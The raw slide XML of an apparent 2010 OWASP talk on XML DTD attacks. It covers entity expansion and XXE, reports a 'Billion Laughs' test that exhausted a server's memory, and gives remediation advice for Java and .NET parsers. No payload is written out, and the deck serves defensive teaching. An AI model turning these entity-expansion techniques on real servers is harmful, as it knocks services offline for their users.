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7" r:id="rId10"/>
    <p:sldId id="268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B2B2B2"/>
    <a:srgbClr val="FF7401"/>
    <a:srgbClr val="FC9204"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="EBEE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7" autoAdjust="0"/>
    <p:restoredTop sz="92083" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="85" d="100"/>
          <a:sy n="85" d="100"/>
        </p:scale>
        <p:origin x="-9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EFDA609-316B-43F2-B784-12372E2E13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E82E11-0175-4C59-9A62-471F0CD0A09F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00889-8D24-4229-8C0D-5E8A30CCE23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12DCC-85EA-47E9-90B1-C9E3F4C03E7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4E5CDC-3058-4CA9-B70C-C71DE341156F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4E5CDC-3058-4CA9-B70C-C71DE341156F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2E65D-4903-4E43-A87B-0FE36D6EF63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43E2AE-E98F-456C-8086-04E27FAE4B2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08116-2B3C-49A5-94A3-552ADD116F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-65" charset="-128"/>
              </a:rPr>
              <a:t>Explain how entity replacement works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AD0FB5-0EAF-4D1F-9668-AD8BA183636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6DE94-98D0-4C30-9969-3724ED1721F7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-65" charset="-128"/>
              </a:rPr>
              <a:t>http://www.actionevents.com.au/images/laughing_clown.jpg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64363-FDDC-4781-BC21-E37762A12CB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19503-0EDA-4400-B4B6-0CD93E46620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 Cigital Inc. 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68C7DA-6AEF-4DA2-9501-CF5365C8A2D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1447800" y="762000"/>
            <a:ext cx="7696200" cy="49530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762000"/>
            <a:ext cx="5867400" cy="1905000"/>
          </a:xfr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3260725"/>
            <a:ext cx="4648200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="96969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5715000"/>
            <a:ext cx="9144000" cy="114935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pic>
        <p:nvPicPr>
          <p:cNvPr id="8198" name="Picture 6" descr="owasp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1066800"/>
            <a:ext cx="1371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038600" y="5165725"/>
            <a:ext cx="4191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>
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © The OWASP Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.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350" y="755650"/>
            <a:ext cx="1417638" cy="3740150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003399">
              <a:alpha val="5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350" y="5302250"/>
            <a:ext cx="1417638" cy="41275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350" y="4845050"/>
            <a:ext cx="1417638" cy="56515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6350" y="2667000"/>
            <a:ext cx="1417638" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003366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4525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17011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2641600"/>
            <a:ext cx="9144000" cy="2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038600" y="593725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EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The OWASP Foundation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l-PL">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8221" name="Freeform 29"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="270510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22" name="Freeform 30"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="738505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524000" y="42291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777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP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038600" y="6326188"/>
            <a:ext cx="480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u="sng">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA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B5091D-C5F2-496C-B2AD-86E484F7A3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FC7813-5EC7-4F96-8A1C-5B627685C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E9DEB7-8AB9-420D-AE2A-D1065B342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225ECA-E130-4C4F-8947-AD122A492A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066F16-E67E-4F00-BC7A-604F14F25C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330B27-75D7-43DF-AC9A-8F3E64B6D0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7A9E54-2B42-4E18-9B38-2C4CA9546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1ED466-17D4-47D2-BC38-BED0AA333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0FC301-F15A-4EC6-9A77-273D7C4A3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709D0C-AC25-4775-99BB-F420162F3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71195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pic>
        <p:nvPicPr>
          <p:cNvPr id="1033" name="Picture 9" descr="owas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7200" y="6248400"/>
            <a:ext cx="381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5200" y="6308725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969696"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{77691E9F-F2DF-4CE3-9B3E-337E751C0B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5689600" y="6270625"/>
            <a:ext cx="238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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP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ebdings" pitchFamily="18" charset="2"/>
        <a:buChar char="&l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ebdings" pitchFamily="18" charset="2"/>
        <a:buChar char="4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uriteam.com/securitynews/6D0100A5PU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.microsoft.com/en-us/library/ms172415.aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ibm.com/developerworks/xml/library/x-tipcfsx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9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667500"/>
            <a:ext cx="1905000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB60470A-A3ED-4AE6-9AF2-85D472F6C66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1447800"/>
            <a:ext cx="6096000" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Flash Talk – XML DTD Attacks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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Jesse Ou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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Cigital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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>jou@cigital.com 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563688" y="4648200"/>
            <a:ext cx="14335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  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Feb 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777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Successful Billion Laughs Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Tex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3250" cy="4729163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>In this screenshot, several seconds after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>a 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>attack, CPU usage increased to 89</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>and memory spiked to 885 MB.  After a few minutes, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>3 GB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>of RAM later, the server stopped responding!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FA966FE5-23EA-446C-8D2C-F19854574501}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr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971800"/>
            <a:ext cx="6861175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Detection in Code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E09702CB-E45C-4857-B6DD-60C1B9ADD7F5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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033588"/>
            <a:ext cx="7966075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4063" y="1719263"/>
            <a:ext cx="7780337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038" rIns="0" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="450850" lvl="1" indent="-168275" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="450850" lvl="1" indent="-168275" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" kern="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74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191000"/>
            <a:ext cx="69469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381000" y="14478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Vulnerable Java Example – SAX parse() method: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457200" y="3733800"/>
            <a:ext cx="716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Vulnerable .NET Example – MSXML Load() method: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Remediation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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Strong Input Validation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>user specified data in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>XML message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>prevent entity references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Should a user’s name really be ‘&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>;’ ??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>In your design, consider whether the client should really be able to specify full XML messages (including DTDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Ideally, disallow DTDs in user-specified XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Configure XML parsers to limit DTD entity expansion, and in general, XML entity depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Newer Java parsers have a expansion limit of 64,000.  Attackers can still make lots of these expensive requests!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Configure XML parsers to not resolve entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0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sz="1200" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRP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-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0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sz="2400" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65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1FC19FC6-0223-48BB-B194-4010B834D628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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65" charset="-128"/>
              </a:rPr>
              <a:t>References</a:t>
            </a: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35000" y="609600"/>
            <a:ext cx="8051800" cy="5867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Gregory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Steuck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> “XXE attack”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.securiteam.com/securitynews/6D0100A5PU.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Elliotte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> Harold “Configure SAX for secure processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html</a:t>
            </a:r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MSDN – System.XML Security Considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/en-us/library/ms172415.aspx</a:t>
            </a:r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More questions? Feel free to ask me offline – jou@cigital.com</a:t>
            </a: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60C72243-9704-4271-81C5-7484B090DBD5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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65" charset="-128"/>
              </a:rPr>
              <a:t>Thank You!</a:t>
            </a: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35000" y="609600"/>
            <a:ext cx="8051800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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More questions? Feel free to ask me offline – jou@cigital.com</a:t>
            </a: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60C72243-9704-4271-81C5-7484B090DBD5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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XML DTD Attacks - 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3200" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Not “new” – has been around since at least 2002 (Gregory Steuck)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>XML is used extensively everywhere!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Popularity of these attacks have increased with XML web services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRP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BD547C64-743F-4968-AC7E-DBFE38CE141E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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XML DTD Attacks - Overview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65" charset="-128"/>
              </a:rPr>
              <a:t>Results from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>input validation of user supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Type Definition (DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>XML values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Most popular parsers are vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>by default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Xerces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>, SAX, MSXML, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p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In recent experience, even the most hardened client systems are vulnerable to these attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p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>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Developers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>not very aware of DTD issues, and don’t implement the relevant security controls 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F0D428E7-4B83-4FD6-A159-B84856C54049}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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XML Entities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In accordance with the XML specification, most XML parsers support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>entity declarations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>in a document’s DOCTYPE section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Built in entities include &amp;lt; and &amp;gt; that map to &lt; and &gt; respectively</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User defined entities are also possible, and these can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>internal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>The XML parser will try to resolve these entities with their corresponding values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US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smtClean="0">
